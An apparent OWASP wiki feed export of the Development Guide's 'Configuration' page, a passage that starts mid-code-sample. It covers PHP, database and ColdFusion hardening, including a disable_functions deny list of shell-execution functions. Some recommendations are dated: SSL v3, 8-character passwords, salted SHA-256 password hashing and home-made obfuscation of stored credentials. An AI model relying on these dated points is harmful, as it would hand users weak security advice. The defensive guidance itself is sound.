	$sFilename = 'somefile.php';&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
// ...&lt;br /&gt;
&lt;br /&gt;
if ( $sFilename != '' )&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
	// Open $sFilename and send its contents to the browser&lt;br /&gt;
&lt;br /&gt;
	// ...&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Another solution is to have as little code as possible in global scope. Object-oriented programming (OOP), done well, lets us put almost all of our code in classes, which is generally safer and promotes reuse. Just as we should never assume that register_globals is off, we should never assume it is on. The correct way to get input from GET, POST, COOKIE, etc. is to use the superglobals that were added in PHP version 4.1.0. These are the $_GET, $_POST, $_ENV, $_SERVER, $_COOKIE, $_REQUEST, $_FILES, and $_SESSION arrays. The term superglobals is used since they are always available without regard to scope.&lt;br /&gt;
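&lt;br /&gt;
For example, the file-serving code above can take its input from the $_GET superglobal and validate it against a whitelist (a sketch; the allowed filenames are illustrative):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
// Whitelist of files this page is allowed to serve (illustrative)&lt;br /&gt;
&lt;br /&gt;
$aAllowed = array('home.php', 'about.php');&lt;br /&gt;
&lt;br /&gt;
$sFilename = isset($_GET['sFilename']) ? $_GET['sFilename'] : '';&lt;br /&gt;
&lt;br /&gt;
if ( in_array($sFilename, $aAllowed, true) )&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
	// Open $sFilename and send its contents to the browser&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;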
&lt;br /&gt;
'''register_globals '''&lt;br /&gt;
&lt;br /&gt;
If set, PHP will create global variables from all user input coming from GET, POST, and COOKIE. If you have the opportunity to turn off this directive, you should definitely do so. Unfortunately, so much existing code relies on it that you are lucky if you can get away with it. &lt;br /&gt;
&lt;br /&gt;
Recommended: off &lt;br /&gt;
&lt;br /&gt;
'''safe_mode '''&lt;br /&gt;
&lt;br /&gt;
The PHP safe mode includes a set of restrictions for PHP scripts and can really increase security in a shared server environment. To name a few of these restrictions: a script can only access/modify files and folders which have the same owner as the script itself, and some functions/operators are completely disabled or restricted, like the backtick operator. &lt;br /&gt;
&lt;br /&gt;
'''disable_functions '''&lt;br /&gt;
&lt;br /&gt;
This directive can be used to disable functions of our choosing. &lt;br /&gt;
&lt;br /&gt;
'''open_basedir '''&lt;br /&gt;
&lt;br /&gt;
Restricts PHP so that all file operations are limited to the directory set here and its subdirectories. &lt;br /&gt;
&lt;br /&gt;
'''allow_url_fopen '''&lt;br /&gt;
&lt;br /&gt;
With this option set, PHP can operate on remote files with functions like include and fopen. &lt;br /&gt;
&lt;br /&gt;
Recommended: off &lt;br /&gt;
&lt;br /&gt;
'''error_reporting '''&lt;br /&gt;
&lt;br /&gt;
We want to write code that is as clean as possible, and thus we want PHP to throw all warnings, etc. at us. &lt;br /&gt;
&lt;br /&gt;
Recommended: E_ALL &lt;br /&gt;
&lt;br /&gt;
'''log_errors '''&lt;br /&gt;
&lt;br /&gt;
Logs all errors to a location specified in php.ini. &lt;br /&gt;
&lt;br /&gt;
Recommended: on &lt;br /&gt;
&lt;br /&gt;
'''display_errors '''&lt;br /&gt;
&lt;br /&gt;
With this directive set, all errors that occur during the execution of scripts, with respect to error_reporting, will be sent to the browser. This is desired in a development environment but not on a production server, since it could expose sensitive information about our code, database or web server. &lt;br /&gt;
&lt;br /&gt;
Recommended: off (production), on (development) &lt;br /&gt;
&lt;br /&gt;
'''magic_quotes_gpc '''&lt;br /&gt;
&lt;br /&gt;
Escapes all input coming in from POST, GET, and COOKIE. This is something we should handle on our own. &lt;br /&gt;
&lt;br /&gt;
This also applies to '''magic_quotes_runtime'''. &lt;br /&gt;
&lt;br /&gt;
Recommended: off &lt;br /&gt;
&lt;br /&gt;
'''post_max_size, upload_max_filesize and memory_limit '''&lt;br /&gt;
&lt;br /&gt;
These directives should be set at a reasonable level to reduce the risk of resource starvation attacks.&lt;br /&gt;
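&lt;br /&gt;
Taken together, the recommendations above correspond to php.ini settings along these lines (a production-server sketch; the disable_functions list, open_basedir path, and size limits are illustrative and must be tuned per application):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
register_globals = Off&lt;br /&gt;
allow_url_fopen = Off&lt;br /&gt;
disable_functions = exec,passthru,shell_exec,system&lt;br /&gt;
open_basedir = /var/www/myapp&lt;br /&gt;
error_reporting = E_ALL&lt;br /&gt;
log_errors = On&lt;br /&gt;
display_errors = Off&lt;br /&gt;
magic_quotes_gpc = Off&lt;br /&gt;
magic_quotes_runtime = Off&lt;br /&gt;
post_max_size = 8M&lt;br /&gt;
upload_max_filesize = 2M&lt;br /&gt;
memory_limit = 32M&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;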
&lt;br /&gt;
==Database security ==&lt;br /&gt;
&lt;br /&gt;
Data obtained from the user needs to be stored securely. In nearly every application, insufficient care is taken to ensure that data cannot be obtained from the database itself.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Does the application connect to the database using low privilege users? &lt;br /&gt;
&lt;br /&gt;
* Are there different database connection users for application administration and normal user activities? If not, why not?&lt;br /&gt;
&lt;br /&gt;
* Does the application make use of safer constructs, such as stored procedures which do not require direct table access?&lt;br /&gt;
&lt;br /&gt;
* Highly protected applications: &lt;br /&gt;
** Is the database on another host? Is that host locked down? &lt;br /&gt;
** Are all patches deployed and the latest database software in use?&lt;br /&gt;
** Does the application connect to the database using an encrypted link? If not, are the application server and database server in a restricted network with minimal other hosts, particularly untrusted hosts like desktop workstations?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* The application should connect to the database using as low-privileged a user as possible.&lt;br /&gt;
&lt;br /&gt;
* The application should connect to the database with different credentials for every trust level (e.g., user, read-only user, guest, administrator), with permissions applied to those tables and databases to prevent unauthorized access and modification.&lt;br /&gt;
&lt;br /&gt;
* The application should prefer safer constructs, such as stored procedures which do not require direct table access. Once all access is through stored procedures, access to the tables should be revoked.&lt;br /&gt;
&lt;br /&gt;
* Highly protected applications: &lt;br /&gt;
** The database should be on another host, which should be locked down with all current patches deployed and latest database software in use.&lt;br /&gt;
** The application should connect to the database using an encrypted link. If not, the application server and database server must reside in a restricted network with minimal other hosts. &lt;br /&gt;
** Do not deploy the database server in the main office network.&lt;br /&gt;
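&lt;br /&gt;
The stored-procedure approach above can be sketched as follows (SQL Server syntax; the table, procedure, and account names are illustrative):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
-- Revoke direct table access from the application's database user&lt;br /&gt;
REVOKE SELECT, INSERT, UPDATE, DELETE ON Users FROM webapp_user;&lt;br /&gt;
&lt;br /&gt;
-- Allow access only through a stored procedure&lt;br /&gt;
GRANT EXECUTE ON sp_GetUserByName TO webapp_user;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;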
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* ITIL – Change Management http://www.itil.org.uk/&lt;br /&gt;
&lt;br /&gt;
==ColdFusion Components (CFCs) ==&lt;br /&gt;
&lt;br /&gt;
This section provides guidance on using ColdFusion components (CFCs) without exposing your web application to unnecessary risk.  ColdFusion provides two ways of restricting access to CFCs: role-based security and access control.&lt;br /&gt;
&lt;br /&gt;
Role-based security is implemented by the '''''roles''''' attribute of the &amp;lt;cffunction&amp;gt; tag.  The attribute contains a comma-delimited list of security roles that can call this method.&lt;br /&gt;
&lt;br /&gt;
Access control is implemented by the '''''access''''' attribute of the &amp;lt;cffunction&amp;gt; tag.  The possible values of the attribute in order of most restricted behavior are: private (strongest), package, public (default), and remote (weakest).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Private:''' The method is accessible only to methods within the same component. This is similar to the Object Oriented Programming (OOP) private identifier.&lt;br /&gt;
&lt;br /&gt;
'''Package:'''  The method is accessible only to other methods within the same package. This is similar to package-private (default) access in OOP languages such as Java.&lt;br /&gt;
&lt;br /&gt;
'''Public:''' The method is accessible to any CFC or CFM page on the same server. This is similar to the OOP public identifier.&lt;br /&gt;
&lt;br /&gt;
'''Remote:''' Allows all the privileges of public, in addition to accepting remote requests from HTML forms, Flash, or web services. This option is required to publish the function as a web service.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practices'''&lt;br /&gt;
&lt;br /&gt;
*Do not use THIS scope inside a component to expose properties. Use a getter or setter function instead.  For example, instead of using THIS.myVar create a public function that sets the variable (i.e. setMyVar(value)).&lt;br /&gt;
&lt;br /&gt;
*Do not omit the roles attribute; if it is omitted, ColdFusion will not restrict user access to the function.&lt;br /&gt;
&lt;br /&gt;
*Avoid using Access=”Remote” if you do not intend to call the component directly from a URL.&lt;br /&gt;
&lt;br /&gt;
==Configuration ==&lt;br /&gt;
&lt;br /&gt;
The following section describes some of the server-wide security-related options available to a ColdFusion administrator via the ColdFusion MX 7 Administrator console web application (http://servername:port/CFIDE/administrator/index.cfm). If the console application is unavailable, you can modify these options by editing the XML files in the cf_root/lib/ (Server configuration) or cf_web_root/WEB-INF/cfusion/lib (J2EE configuration) directory; however, editing these files directly is not recommended.  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practice '''&lt;br /&gt;
&lt;br /&gt;
*CF Admin Password screen&lt;br /&gt;
&lt;br /&gt;
*Enable a strong Administrator password&lt;br /&gt;
**'''The ColdFusion Administrator is the default interface for configuring the ColdFusion application server. It is secured by a single password. Ensure that the Administrator security is enabled and the password is strong and stored in a secure place.'''&lt;br /&gt;
**Ensure the checkbox is filled&lt;br /&gt;
**Enter and confirm a strong password string of 8 characters or more&lt;br /&gt;
**Click Submit Changes&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Sandbox Security screen'''&lt;br /&gt;
&lt;br /&gt;
Enable Sandbox Security&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''The ColdFusion Sandbox allows you to place access security restrictions on files, directories, methods, and data sources.  Sandboxes make the most sense for a hosting provider or corporate intranet where multiple applications share the same server. Enable this option.'''&lt;br /&gt;
&lt;br /&gt;
'''Next, a sandbox needs to be configured; otherwise, all code in all directories will execute without restriction.  Code in a directory and its subdirectories inherits the access controls defined for the sandbox.  For example, if ABC Company creates multiple applications within their directory, all applications will have the same permissions as the parent.  A sandbox applied to ABC-apps will apply to app1 and app2.  A sample directory structure is shown below:'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''D:\inetpub\wwwroot\ABC-apps\app1'''&lt;br /&gt;
&lt;br /&gt;
'''D:\inetpub\wwwroot\ABC-apps\app2'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Note: if a new sandbox is created for app2 then it will not inherit settings from ABC-apps.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Sandbox security configurations are application specific; however, there are general guidelines that should be followed:'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Create a default restricted sandbox and copy its settings to each subsequent sandbox, removing restrictions as needed by the application.  The exception is files/directories, where access is granted rather than restricted.&lt;br /&gt;
&lt;br /&gt;
Restrict access to data sources that should not be accessed by the sandboxed application.&lt;br /&gt;
&lt;br /&gt;
Restrict access to powerful tags, for example CFREGISTRY and CFEXECUTE.&lt;br /&gt;
&lt;br /&gt;
Restrict file and directory access to limit the ability of tags and functions to perform actions to specified paths.&lt;br /&gt;
&lt;br /&gt;
'''''Every''''' application should have a sandbox.&lt;br /&gt;
&lt;br /&gt;
In multi-homed environments, disable JavaServer Pages (JSP), as ColdFusion is unable to restrict the functionality of the underlying Java server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''RDS Password screen'''&lt;br /&gt;
&lt;br /&gt;
Enable a strong RDS password&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Developers can access ColdFusion resources (files and data sources) over HTTP from Macromedia Dreamweaver MX and HomeSite+ through ColdFusion’s Remote Development Services (RDS). This feature is password protected and should only be enabled in secure development environments.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensure the checkbox is filled&lt;br /&gt;
&lt;br /&gt;
Enter and confirm a strong password string of 8 characters or more&lt;br /&gt;
&lt;br /&gt;
Click Submit Changes&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Use RDS over SSL - During development, you should use SSL v3 to encrypt all RDS communications between Dreamweaver MX and the ColdFusion server. This includes remote access to server data sources and drives, provided that both are accessed through RDS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disable RDS in Production&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''In production environments, you should not use RDS. In earlier versions of ColdFusion, RDS ran as a separate service or process and could be disabled by disabling the service. In ColdFusion MX, RDS is integrated into the main service. To disable it, you must disable the RDSServlet mapping in the web.xml file. The following procedure assumes that ColdFusion is installed in the default location.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''1.	Back up the C:\CFusionMX7\wwwroot\WEB-INF\web.xml file.'''&lt;br /&gt;
&lt;br /&gt;
'''2.	Open the web.xml file for editing.'''&lt;br /&gt;
&lt;br /&gt;
'''3.	Comment out the RDSServlet mapping, as follows:'''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;!--'''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;servlet-mapping&amp;gt; '''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;servlet-name&amp;gt;RDSServlet&amp;lt;/servlet-name&amp;gt; '''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;url-pattern&amp;gt;/CFIDE/main/ide.cfm&amp;lt;/url-pattern&amp;gt; '''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;/servlet-mapping&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
'''--&amp;gt; '''&lt;br /&gt;
&lt;br /&gt;
'''4.	Save the file.'''&lt;br /&gt;
&lt;br /&gt;
'''5.	Restart ColdFusion.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Settings Screen&lt;br /&gt;
&lt;br /&gt;
Enable a Request Timeout&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''ColdFusion processes requests simultaneously and queues all requests above the configured maximum number of simultaneous requests. Requests that run abnormally long can tie up server resources and leave the server vulnerable to DoS attacks. This setting terminates requests when the configured timeout is reached.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Fill the checkbox next to “Timeout Request after (seconds)”&lt;br /&gt;
&lt;br /&gt;
Enter the number of seconds for ColdFusion to allow threads to run&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''To allow a valid template request to run beyond the configured timeout, place a &amp;lt;cfsetting&amp;gt; tag at the top of the base ColdFusion template and configure the RequestTimeout attribute for the necessary amount of time (in seconds).'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Use UUID for cftoken&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best practice calls for J2EE session management. In the event that only ColdFusion session management is available, strong security identifiers must be used. Enable this setting to change the default 8-character CFToken security token string to a UUID.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Enable Global Script Protection - This is a new security feature in ColdFusion MX 7 that isn’t available in other web application platforms. It helps protect Form, URL, CGI, and Cookie scope variables from cross-site scripting attacks. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Specify a Site-wide Error Handler &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Prevent information leaks through verbose error messages. Specifying a site-wide error handler covers you when cftry/cfcatch are not used. This page should be a generic error message that you return to the user. Also, if the error handler displays user-input, it should be reviewed for potential cross-site scripting issues.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Specify a Missing Template Handler &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Provide a custom message page for HTTP 404 errors when the server cannot find the requested ColdFusion template.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configure a memory throttling &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''To prevent file upload DoS attacks, Macromedia added new configuration settings to ColdFusion MX 7.0.1 that allow administrators to restrict the total upload size of HTTP POST operations. Configure these settings accordingly.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
maximum size for post data&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''This is the total size that ColdFusion will accept for any single HTTP POST request (including file uploads). ColdFusion will reject any request whose Content-Length header exceeds this setting.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Request Throttle Threshold &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''HTTP POST requests larger than this setting (default is 4MB) are included in the total concurrent request memory size and get queued if they exceed the Request Throttle Memory setting.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Request Throttle Memory &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''This sets the total amount of memory (MB) ColdFusion reserves for concurrent HTTP POST requests. Any requests exceeding this limit are queued until enough memory is available. '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Memory Variables screen'''&lt;br /&gt;
&lt;br /&gt;
Enable J2EE Session Management and Use J2EE session variables.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Best practice requires J2EE sessions because they are more secure than regular ColdFusion sessions. (See Session Management section)&lt;br /&gt;
&lt;br /&gt;
Select checkbox next to “Enable Session Variables”&lt;br /&gt;
&lt;br /&gt;
Select checkbox next to “Enable J2EE session variables”&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the maximum session timeout to 20 minutes to limit the window of opportunity for session hijacking.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the default session timeout to 20 minutes to limit the window of opportunity for session hijacking. (The default value is 20 minutes.)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The session-timeout parameter in the cf_root/WEB-INF/web.xml file establishes the maximum J2EE session timeout. This setting should always be greater than or equal to ColdFusion’s Maximum Session Timeout value.&lt;br /&gt;
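&lt;br /&gt;
For example, a 20-minute maximum J2EE session timeout is set in cf_root/WEB-INF/web.xml as follows (the session-timeout value is expressed in minutes):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;session-config&amp;gt;&lt;br /&gt;
	&amp;lt;session-timeout&amp;gt;20&amp;lt;/session-timeout&amp;gt;&lt;br /&gt;
&amp;lt;/session-config&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;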
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the maximum application timeout to 24 hours.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the default application timeout to 8 hours.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Data Sources screen'''&lt;br /&gt;
&lt;br /&gt;
Do not use an administrative account to connect ColdFusion to a data source. For example, do not use the SA account to connect to a MS SQL Server. The account accessing the database should be granted only the specific privileges to the objects it needs to access. In addition, the account created to connect to the database should be an OS-based account, not a SQL account. Operating system accounts have many more auditing, password, and other security controls associated with them.  For example, account lockouts and password complexity requirements are built into the Windows operating system; however, a database would need custom code to handle these security-related tasks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disable the following Allowed SQL options for all data sources:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Create&lt;br /&gt;
&lt;br /&gt;
Drop&lt;br /&gt;
&lt;br /&gt;
Grant&lt;br /&gt;
&lt;br /&gt;
Revoke&lt;br /&gt;
&lt;br /&gt;
Alter&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''As an administrator, you do not have control over what a developer sends to the database; however, there should be no circumstance where the previous commands need to be sent to a database from a web application.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Debugging Settings screen'''&lt;br /&gt;
&lt;br /&gt;
Disable Robust Exception Information for production servers. (Default)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disable Debugging for production servers. (Default)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Debugging IP Addresses'''&lt;br /&gt;
&lt;br /&gt;
Ensure only the addresses of trusted clients are in the IP list.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Only allow the localhost IP (127.0.0.1) in the list on production machines&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Mail screen'''&lt;br /&gt;
&lt;br /&gt;
Require a user name and password to authenticate to your mail server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the connection timeout to 60 seconds (The default value is 60 seconds.)&lt;br /&gt;
&lt;br /&gt;
==Links==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Activity|Secure Lifecycle]]&lt;br /&gt;
[[category:Deployment]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Configuration&amp;diff=59980</id>
		<title>Configuration</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Configuration&amp;diff=59980"/>
				<updated>2009-05-03T21:36:09Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* How to identify if you are vulnerable */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To produce applications which are secure out of the box.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
All.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS6 – Manage Changes – All sections should be reviewed&lt;br /&gt;
&lt;br /&gt;
==Best Practices ==&lt;br /&gt;
&lt;br /&gt;
Turn off all unnecessary features by default&lt;br /&gt;
&lt;br /&gt;
* Ensure that all switches and configuration options for every feature are initially set to the safest possible choice.&lt;br /&gt;
&lt;br /&gt;
* Inspect the design to see if the less safe choices could be designed in another way. For example, password reset systems are intrinsically unsound from a security point of view. If you do not ship this component, your application’s users will be safer.&lt;br /&gt;
&lt;br /&gt;
* Do not rely on optionally installed features in the base code.&lt;br /&gt;
&lt;br /&gt;
* Do not configure anything in preparation for an optionally deployable feature.&lt;br /&gt;
&lt;br /&gt;
==Default passwords ==&lt;br /&gt;
&lt;br /&gt;
Applications often ship with well-known passwords. In a particularly excellent effort, NGS Software determined that Oracle’s “Unbreakable” database server contained 168 default passwords out of the box. Obviously, changing this many credentials every time an application server is deployed is out of the question, nor should it be necessary.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Inspect the application’s manifest and ensure that no passwords are included in any form, whether within the source files, compiled into the code, or as part of the configuration.&lt;br /&gt;
&lt;br /&gt;
* Inspect the application for usernames and passwords. Ensure that diagrams also do not have any.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Do not ship the product with any configured accounts.&lt;br /&gt;
&lt;br /&gt;
* Do not hard code any backdoor accounts or special access mechanisms.&lt;br /&gt;
&lt;br /&gt;
==Secure connection strings ==&lt;br /&gt;
&lt;br /&gt;
Connection strings to the database are rarely encrypted. However, an attacker who obtains shell access can use a clear text connection string to perform direct operations against the database or back end systems, providing a leap point for total compromise. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Check your framework’s configuration file, registry settings, and any application based configuration file (usually config.php, etc) for clear text connection strings to the database.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Sometimes, using no stored password at all (for example, integrated authentication) is just as good as storing a clear text password.&lt;br /&gt;
&lt;br /&gt;
* On the Win32 platform, use “TrustedConnection=yes”, and create the DSN with a stored credential. The credential is stored as a LSA Secret, which is not perfect, but is better than clear text passwords.&lt;br /&gt;
&lt;br /&gt;
* Develop a method to obfuscate the password in some form, such as “encrypting” the name using the hostname or similar within code in a non-obvious way.&lt;br /&gt;
&lt;br /&gt;
* Ask the database developer to provide a library which allows remote connections using a password hash instead of a clear text credential.&lt;br /&gt;
&lt;br /&gt;
==Secure network transmission ==&lt;br /&gt;
&lt;br /&gt;
By default, no unencrypted data should transit the network. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Use a packet capture tool, such as Ethereal, and mirror a switch port near the database or application servers.&lt;br /&gt;
&lt;br /&gt;
* Sniff the traffic for a while and determine your exposure to an attacker performing this exact same task.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Use SSL, SSH and other forms of encryption (such as encrypted database connections) to prevent data from being intercepted or interfered with over the wire.&lt;br /&gt;
&lt;br /&gt;
==Encrypted data ==&lt;br /&gt;
&lt;br /&gt;
Some information security policies and standards require the database on-disk data to be encrypted. However, this is essentially useless if the database connection allows clear text access to the data. What is more important is the obfuscation and one-way encryption of sensitive data.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Highly protected applications:&lt;br /&gt;
&lt;br /&gt;
* Is there a requirement to encrypt certain data?&lt;br /&gt;
&lt;br /&gt;
* If so, is it “encrypted” in such a fashion that allows a database administrator to read it without knowing the key?&lt;br /&gt;
&lt;br /&gt;
If it can, the “encryption” is useless and another approach is required.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Highly protected applications and any application that has a requirement to encrypt data:&lt;br /&gt;
&lt;br /&gt;
* Passwords should only be stored in a salted, non-reversible format, such as a SHA-256 hash&lt;br /&gt;
&lt;br /&gt;
* Sensitive data like credit cards should be carefully considered – do they have to be stored at all? '''The PCI guidelines are very strict''' '''on the storage of credit card data'''. '''We strongly recommend against it. '''&lt;br /&gt;
&lt;br /&gt;
* Encrypted data should not have the key on the database server. &lt;br /&gt;
&lt;br /&gt;
The last requirement forces an attacker to take control of two machines to bulk decrypt data. The encryption key should be able to be changed on a regular basis, and the algorithm should be strong enough to protect the data for its required lifetime. For example, there is no point in using 56-bit DES today; data should be encrypted using AES-128 or better.&lt;br /&gt;
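&lt;br /&gt;
A minimal sketch of such non-reversible storage, assuming PHP 5.1 or later for the hash() function (the variable names and salt scheme here are illustrative, not part of this guide):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
// Generate a per-user random salt (illustrative only)&lt;br /&gt;
$sSalt = hash('sha256', uniqid(mt_rand(), true));&lt;br /&gt;
&lt;br /&gt;
// Store only the salt and the one-way hash, never the password itself&lt;br /&gt;
$sHash = hash('sha256', $sSalt . $sPassword);&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
At login, recompute the hash from the stored salt and the submitted password and compare the two hashes; the clear text password never needs to be stored.&lt;br /&gt;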
&lt;br /&gt;
==PHP Configuration ==&lt;br /&gt;
&lt;br /&gt;
==Global variables  ==&lt;br /&gt;
&lt;br /&gt;
Variables declared outside of functions are considered global by PHP, while a variable declared inside a function is in local function scope. PHP handles global variables quite differently from languages like C. In C, a global variable is always available in local scope as well as global, as long as it is not overridden by a local definition. In PHP things are different: to access a global variable from local scope, you have to declare it global in that scope. The following example shows this:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
$sTitle = 'Page title'; // Global scope&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
function printTitle()&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
global $sTitle; // Declare the variable as global&lt;br /&gt;
&lt;br /&gt;
	echo $sTitle; // Now we can access it as if it were a local variable&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
